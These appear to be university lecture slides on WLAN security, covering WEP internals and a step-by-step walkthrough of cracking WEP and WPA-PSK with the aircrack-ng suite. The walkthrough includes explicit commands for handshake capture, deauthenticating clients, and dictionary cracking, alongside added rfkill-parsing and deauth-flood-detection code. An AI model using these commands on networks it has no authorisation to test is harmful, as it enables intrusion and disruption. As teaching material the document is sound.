WLAN Security: Cracking WEP/WPA
Assoc. Prof. Anan Phonphoem, Ph.D. (รศ. ดร. อนันต์ ผลเพิ่ม) [email protected]
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department
Kasetsart University, Bangkok, Thailand
Wireless LANs
WEP Block Diagram
Encryption block (sender site):
• Plain Text -> Integrity Algorithm (CRC-32) -> Integrity Check Value (ICV), appended to the Plain Text
• Initialization Vector (IV) + Secret Key (40-bit or 128-bit) -> Pseudo-Random Number Generator (RC-4) -> Key Sequence
• (Plain Text || ICV) XOR Key Sequence -> Cipher Text; the IV is sent in the clear with the frame
Decryption block (receiver site):
• IV (taken from the received frame) + Secret Key (40-bit or 128-bit) -> Pseudo-Random Number Generator (RC-4) -> Key Sequence
• Cipher Text XOR Key Sequence -> Plain Text || ICV
• Integrity Algorithm over the recovered Plain Text -> ICV', compared with the received ICV
WEP – Encoding
(Encryption block of the WEP block diagram, shown on its own: CRC-32 ICV over the plain text, RC-4 key sequence generated from IV || secret key, bitwise XOR producing the cipher text.)
WEP Frame
+--------------+-----------+------------+---------+---------------+
| Frame Header | IV Header | Frame Body |   ICV   | Trailer (FCS) |
|              |  4 bytes  |            | 4 bytes |               |
+--------------+-----------+------------+---------+---------------+
   clear text   clear text   encrypted   encrypted   clear text
WEP – Decryption
(Decryption block of the WEP block diagram, shown on its own: RC-4 key sequence generated from the received IV || secret key, bitwise XOR recovering plain text || ICV, integrity algorithm recomputing the ICV for comparison.)
Cracking WEP
Cracking Steps
1) Reconnaissance (Collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
Default SSIDs
1) Reconnaissance (Collect target info.)
Kismet (Reconnaissance)
Kismet (AP Info.)
Kismet (Client Info.)
2) Run promiscuous mode
Regular Behavior (four stations, 1 to 4): station 1 transmits to all (broadcast).
Intention to Eavesdrop: station 1 transmits to station 4; a station in promiscuous mode also captures the frame although it is not the addressed receiver.
iwconfig
iwlist
Promiscuous Mode Setup
• By using iwconfig
• By using airmon-ng
3) Collect data
airodump
From Kismet
Airodump problem
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is the interface to the Linux kernel's rfkill subsystem, which enables or disables (unblocks or blocks) radio transmitters
anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
Soft blocked: no   (soft block: set by software, so software can clear it)
Hard blocked: no   (hard block: set by a hardware switch, so software cannot clear it)
1: acer-wireless: Wireless LAN
Soft blocked: no
Hard blocked: no
2: acer-bluetooth: Bluetooth
Soft blocked: no
Hard blocked: no
4: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
Solve by:
root@APMoose:~/toulouse# rfkill unblock all
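A small check that turns the `rfkill list` output above into an answer to "why does airodump-ng fail and what clears it", as an added example that is not from the slides. The sample output is modelled on the slide's listing, with the soft block on acer-wireless changed to "yes" (a constructed value) so that the blocked case is exercised; the parser itself works on real `rfkill list` text.

```python
"""Parse `rfkill list` output and report blocked radios together with the way
to clear them (added example; not from the slides)."""
import re

# Constructed sample: the slide's listing with acer-wireless soft-blocked
SAMPLE_RFKILL = """\
0: phy0: Wireless LAN
\tSoft blocked: no
\tHard blocked: no
1: acer-wireless: Wireless LAN
\tSoft blocked: yes
\tHard blocked: no
2: acer-bluetooth: Bluetooth
\tSoft blocked: no
\tHard blocked: no
4: hci0: Bluetooth
\tSoft blocked: no
\tHard blocked: no
"""

# Device header line: "<index>: <name>: <type>"
DEVICE_RE = re.compile(r"^(\d+): ([^:]+): (.+)$")


def parse_rfkill(text: str):
    """Return one dict per device: id, name, type, soft (bool), hard (bool)."""
    devices = []
    for line in text.splitlines():
        m = DEVICE_RE.match(line)
        if m:
            devices.append({"id": int(m.group(1)), "name": m.group(2),
                            "type": m.group(3), "soft": False, "hard": False})
            continue
        key, _, value = line.strip().partition(": ")
        if devices and key in ("Soft blocked", "Hard blocked"):
            field = "soft" if key.startswith("Soft") else "hard"
            devices[-1][field] = (value.strip() == "yes")
    return devices


def blocked_radios(text: str, radio_type: str = "Wireless LAN"):
    """Return (device name, advice) for every blocked device of the given type.
    A hard block comes from a hardware switch and cannot be cleared by rfkill;
    a soft block is cleared with `rfkill unblock <id>` (or `rfkill unblock all`)."""
    advice = []
    for dev in parse_rfkill(text):
        if dev["type"] != radio_type:
            continue
        if dev["hard"]:
            advice.append((dev["name"],
                           "hard blocked: toggle the hardware radio switch; rfkill cannot clear it"))
        elif dev["soft"]:
            advice.append((dev["name"],
                           f"soft blocked: run `rfkill unblock {dev['id']}` (or `rfkill unblock all`)"))
    return advice


if __name__ == "__main__":
    for name, what in blocked_radios(SAMPLE_RFKILL):
        print(f"{name}: {what}")
```

On a live system, feed it `subprocess.run(["rfkill", "list"], capture_output=True, text=True).stdout` instead of the sample string; an empty result for "Wireless LAN" means the RF-kill error from airodump-ng has a different cause.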
airodump
airodump data files
4) Crack Key
aircrack
• For non-encryption
WEP Cracking Demo
Cracking WPA
Cracking Steps
1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on the AP channel with a filter for the bssid to collect the authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake
Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa
1) Start Monitoring Mode
Check interface: iwconfig
Start monitoring mode
2) Start airodump-ng to collect the authentication handshake
Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter                   Description
-c 6                        Wireless channel
--bssid 00:1E:F7:xx:xx:xx   AP's MAC address
-w psk                      File name prefix for the capture files (contain the IVs)
mon0                        Interface name
Start airodump-ng with fewer parameters
Moose# airodump-ng -w psk mon0
3) Deauthenticate client
aireplay
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter                 Description
-0                        Deauthentication attack mode
1                         Number of deauthentication packets to send
-a 00:12:01:xx:xx:xx      AP's MAC address
-c 00:23:11:xx:xx:xx      MAC address of the client to deauthenticate
mon0                      Interface name
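The defender's view of step 3: forged deauthentication frames are management frames sent with the AP's MAC address as source, so a burst of them toward one client within a short window is the signature a wireless IDS looks for. The detector below is an added example, not from the slides or from aircrack-ng; it runs over a constructed monitor-mode frame log (one line per frame: seconds, type, subtype, source MAC, destination MAC) with a sliding time window per (source, destination) pair. Management frame protection (802.11w) lets clients reject such forged frames outright; where it is not deployed, detection of the burst is what remains.

```python
"""Deauthentication-flood detection over a constructed monitor-mode frame log
(added example; not from the slides). Log line format (assumed):
<seconds> <type> <subtype> <source MAC> <destination MAC>"""
from collections import defaultdict, deque

# Constructed sample: ordinary data frames, one isolated deauth, then a burst
# of deauths carrying the AP's address toward a single client.
SAMPLE_LOG = """\
0.00 data data 00:23:11:dd:ee:ff 00:12:01:aa:bb:cc
0.10 data data 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
0.50 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:00:00:99
1.00 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.05 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.10 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.15 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.20 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.25 mgmt deauth 00:12:01:aa:bb:cc 00:23:11:dd:ee:ff
1.30 mgmt auth 00:23:11:dd:ee:ff 00:12:01:aa:bb:cc
"""


def parse_log(text: str):
    """Return a list of (time, type, subtype, src, dst) tuples, skipping blank lines."""
    frames = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, ftype, subtype, src, dst = line.split()
        frames.append((float(t), ftype, subtype, src.lower(), dst.lower()))
    return frames


def detect_deauth_floods(frames, threshold: int = 5, window: float = 1.0):
    """Return one alert per (src, dst) pair whose deauth count inside a sliding
    window of `window` seconds reaches `threshold`.
    Each alert is (src, dst, count_at_alert, time_of_alert)."""
    recent = defaultdict(deque)     # (src, dst) -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for t, ftype, subtype, src, dst in frames:
        if ftype != "mgmt" or subtype != "deauth":
            continue
        q = recent[(src, dst)]
        q.append(t)
        while q and t - q[0] > window:   # drop deauths older than the window
            q.popleft()
        if len(q) >= threshold and (src, dst) not in alerted:
            alerted.add((src, dst))
            alerts.append((src, dst, len(q), t))
    return alerts


if __name__ == "__main__":
    for src, dst, count, t in detect_deauth_floods(parse_log(SAMPLE_LOG)):
        print(f"t={t:.2f}s deauth flood: {count} frames from {src} to {dst} within 1 s")
```

The single deauth at 0.50 s toward another client never reaches the threshold, so only the burst raises an alert; the threshold and window are the two knobs to tune against the legitimate deauth rate of the network being monitored.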
4) Crack
Need a dictionary
Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap
With dictionary
Moose# aircrack-ng -w password.lst psk*.cap
Handshake found
Successfully cracked